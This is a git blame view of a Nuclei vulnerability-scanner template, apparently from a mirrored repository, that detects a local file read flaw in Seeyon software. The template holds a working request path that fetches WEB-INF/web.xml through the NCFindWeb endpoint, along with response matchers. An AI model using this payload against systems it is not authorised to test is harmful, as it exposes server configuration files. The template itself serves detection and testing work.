daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/other/wooyun-2015-148227.yaml

29 lines
782 B
YAML
Raw Normal View History

Renames vulnerabilities/other/WooYun2015-148227 (#3488) Swaps capitalization to all lowercase, as Linux filesystems don't handle capitalization well which may result in this file being skipped.
2022-01-06 06:30:31 +00:00
id: wooyun-2015-148227
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
Create WooYun-2015-148227.yaml
2021-04-22 08:59:47 +00:00
info:
name: Seeyon WooYun LFR
author: princechaddha
severity: high
Add description
2021-10-27 11:03:22 +00:00
description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
reference:
- https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
Create WooYun-2015-148227.yaml
2021-04-22 08:59:47 +00:00
tags: seeyon,wooyun,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=WEB-INF/web.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<servlet-name>NCInvokerServlet</servlet-name>"
part: body
- type: word
part: header
words:
- "application/xml"